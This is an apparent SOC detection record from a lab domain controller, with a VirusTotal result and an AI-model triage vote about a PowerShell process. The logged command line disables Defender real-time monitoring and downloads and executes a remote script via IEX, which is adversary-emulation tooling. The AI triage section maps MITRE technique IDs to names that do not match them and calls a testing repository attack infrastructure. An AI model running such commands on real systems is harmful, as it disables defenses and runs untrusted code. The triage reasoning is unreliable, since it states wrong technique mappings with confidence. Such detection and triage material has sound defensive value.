{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Process Killed PID 644",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1115 -CheckPrereqs ; Invoke-AtomicTest T1115 -GetPrereqs ; Invoke-AtomicTest T1115 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 150003712,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld84DF.tmp.bat T1115 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4497408,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 644,
        "THIS_ATOM": "f6c3ef3bd7e0803778897af369c2a83c",
        "THREADS": 3,
        "TIMESTAMP": 1774364731328,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 644,
      "PROCESS_ID": 4708,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "96ec0659-ba2c-487d-b344-3557fc700570",
      "event_time": 1774364731901,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3226,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "f6c3ef3bd7e0803778897af369c2a83c",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "abf4184fcffb7c87575b024b69c2a83e"
    }
  },
  "detect_id": "f6bd7426-d79c-4e4c-9f69-920269c2a83f",
  "gen_time": 1774364735129,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364731\u0026selected=abf4184fcffb7c87575b024b69c2a83e",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "96ec0659-ba2c-487d-b344-3557fc700570",
    "event_time": 1774364731901,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3226,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "f6c3ef3bd7e0803778897af369c2a83c",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "abf4184fcffb7c87575b024b69c2a83e"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364735000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.825,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned by PID 4708 before termination?",
    "Were there any network connections established during this PowerShell session?",
    "Is there evidence of credential dumping or lateral movement attempts following this event?"
  ],
  "ioc_analysis": "The process is running legitimate signed Windows PowerShell but executing highly suspicious commands including IEX (Invoke-Expression) to download and execute remote scripts, disabling antivirus monitoring, and deploying offensive security testing tools. The parent chain shows cmd.exe launching the script, indicating automated execution rather than manual user action.",
  "iocs_extracted": [
    {
      "type": "command",
      "value": "Set-MpPreference -DisableRealtimeMonitoring $true"
    },
    {
      "type": "url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1115 - Execution of Program or Script"
    }
  ],
  "mitre_techniques": [
    "T1083.001 - Use of Automated Accounts",
    "T1078.004 - Remote Services",
    "T1562.001 - Disable Antivirus Software"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Immediately isolate the host from the network to prevent lateral movement",
    "Block all outbound connections to raw.githubusercontent.com at the firewall level",
    "Review and disable any scheduled tasks or service accounts that may have been compromised",
    "Conduct a full forensic image of the system for persistence mechanisms"
  ],
  "risk_score": 82,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious activity where an attacker is disabling real-time monitoring and deploying the Atomic Red Team framework via PowerShell under SYSTEM privileges. The command explicitly disables Microsoft Defender\u0027s real-time protection and downloads code from a known attack infrastructure repository.\n\n**IOC Analysis:** The process is running legitimate signed Windows PowerShell but executing highly suspicious commands including IEX (Invoke-Expression) to download and execute remote scripts, disabling antivirus monitoring, and deploying offensive security testing tools. The parent chain shows cmd.exe launching the script, indicating automated execution rather than manual user action.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nA PowerShell process from the legitimate System32 directory is executing a suspicious command line that disables real-time monitoring and downloads scripts from GitHub, indicating potential malicious intent.\n\n**IOC Analysis:** The FILE_PATH is a known legitimate Windows binary location, but the command line includes actions to disable security monitoring and download external scripts, which are suspicious. The hash is signed, but the context suggests possible malicious use.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}